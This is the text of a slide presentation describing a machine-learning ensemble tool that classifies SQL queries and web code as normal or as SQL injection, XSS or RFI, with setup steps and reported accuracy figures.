Software Vulnerability
Detection Tool Using
Machine Learning
This presentation explores a groundbreaking software vulnerability
detection tool leveraging the power of machine learning algorithms
to protect against critical threats such as SQL injection, cross-site
scripting (XSS), and remote file inclusion (RFI).
The Rise of Machine Learning in Security
Accuracy and Efficiency Data-Driven Approach
Machine learning algorithms offer high prediction Machine learning models are trained on vast datasets
accuracy (over 95%) in various fields, from medical of past vulnerabilities, enabling them to identify new
disease prediction to traffic analysis. threats with unprecedented precision.
Classifying Vulnerabilities
1 No Vulnerability 2 SQL Injection
Normal SQL statements Attackers inject malicious
or XSS code that poses no commands into SQL
security risk. queries, potentially
compromising sensitive
data.
3 XSS or RFI
Attackers exploit vulnerabilities in web code to inject
malicious scripts or files, gaining unauthorized access or
control.
Training the Model
Dataset: SQL Queries Dataset: XSS & RFI Code
This dataset contains a diverse range of SQL queries, The dataset includes web code snippets, labeled as
categorized as either normal or containing injections, either 'No Vulnerability', 'XSS' or 'RFI', for
with labels '1' for injection and '0' for normal. comprehensive training.
Testing and Evaluation
Test Dataset Prediction
A separate dataset of unlabeled The trained model is applied to
SQL queries, XSS code, and RFI the test dataset to predict the
code, to evaluate the model's type of vulnerability present in
accuracy and effectiveness. each query.
System Architecture
User Interface
1 Provides a user-friendly interface for interacting with the vulnerability detection tool.
Dataset Processing
2 Prepares and cleans the input dataset, using natural language processing techniques to extract
essential features.
Ensemble Algorithm
3
Combines multiple machine learning algorithms to achieve optimal performance and reduce bias.
Model Evaluation
4 Evaluates the model's accuracy and effectiveness using metrics such as precision,
recall, and F-score.
Prediction Engine
5
Utilizes the trained model to predict vulnerability types for new test queries.
Project Setup and Deployment
Prerequisites
1
Install Python 3.7, a MySQL database, and copy the database content from 'DB.txt'.
NLTK Installation
2
Download and install the necessary Natural Language Toolkit (NLTK) packages.
Project Execution
3 Start the Django web server by running 'run.bat' and
access the application through the provided URL.
User Interface and Functionality
Dataset Loading and Model Training
Dataset Upload
Select and upload the vulnerability dataset file ('dataset_vulner.csv').
Dataset Overview
Displays statistics about the loaded dataset, including the number of records and classes.
Run Ensemble Algorithms
Trains the machine learning ensemble model on the preprocessed dataset.
Model Evaluation
Shows the model's accuracy and other performance metrics, such as precision, recall, and F-score.
Vulnerability Prediction and Results
95% 0.98 0.92
Accuracy Precision Recall
The model achieved an accuracy of 95% in detecting vulnerabilities. The model accurately identified 98% of the vulnerabilities. The model detected 92% of all existing vulnerabilities.